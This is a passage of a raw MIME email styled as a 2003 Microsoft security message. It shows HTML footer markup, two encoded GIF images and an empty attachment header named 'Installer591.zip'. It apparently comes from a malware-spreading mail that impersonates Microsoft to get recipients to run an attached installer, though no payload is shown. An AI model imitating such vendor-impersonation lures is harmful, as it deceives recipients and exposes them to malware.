visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top">
Microsoft Security Advisor</A> web site, =
or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" =
TARGET=3D"_top">Contact Us.</A>
<BR><BR>
Thank you for using Microsoft products.<BR><BR></FONT>
<FONT SIZE=3D"1">Please do not reply to this message. =
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.<BR></FONT>
<HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%">
<FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and =
products mentioned herein are the trademarks =
of their respective owners.</FONT>
</TD></TR></TABLE>
<BR>
<TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB">
<TR VALIGN=3D"TOP">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/=
contactus/contactus.asp" TARGET=3D"_top">Contact Us</A>
|
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" =
TARGET=3D"_top">Legal</A>
|
<A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" =
TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A>
</FONT></B>
</TD>
</TR>
<TR VALIGN=3D"MIDDLE">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1">
©2003 Microsoft Corporation. All rights reserved.
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
info/cpyright.htm" TARGET=3D"_top">Terms of Use</A>
|
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
info/privacy.htm" TARGET=3D"_top">
Privacy Statement</A> |
<A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/=
enable/" TARGET=3D"_top">Accessibility</A>
</FONT>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
--agveldcmhfduq--
--sfsyzfnjgij
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <uryxmkn>
R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy
zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29
yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX
55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z
3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk
3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt
9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx
/+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r
9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV
606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO
X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg
4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI
sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg
mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD
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
--sfsyzfnjgij
Content-Type: image/gif
Content-Transfer-Encoding: base64
Content-ID: <xojrpyd>
R0lGODlhDAAMANUAAP////f3//f39+/v9+/v797m987W787W5sXW5rXF76295qW975y175St75St
3pSlzoyl1oSl5oylzoycxXOU3nOMxWOM5mOM3mOE1lqE3mOEvVKE1lp7xVJ71lJ7zlJ7xVJ7vUp7
zkpzzkpzxVJzrUprvUJrxUJrvUJjtTpjtTpjrTparTpapQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADAAMAAAIjAABAAhwwMGFCxAQ
CACwkICDDBYSLGjQwQEBhg8zDBAIYIEIBwIQdLjAoOOFgSFMIICwIUMEAxQwCBxhAgKHDh5C6DQA
IIGJEyA4fPAwYoQCAAVKoEgBQsKJEidQ8CyRYumDA1VTqNBQQYXXFQofsPB6AIAKFiweNBTLoiza
BxcFCjgwgQSJCQcWCggIADs=
--sfsyzfnjgij--
--qnuuxbnqkxdj
Content-Type: application/x-compressed; name="Installer591.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment
--qnuuxbnqkxdj--
- 15
|
|
|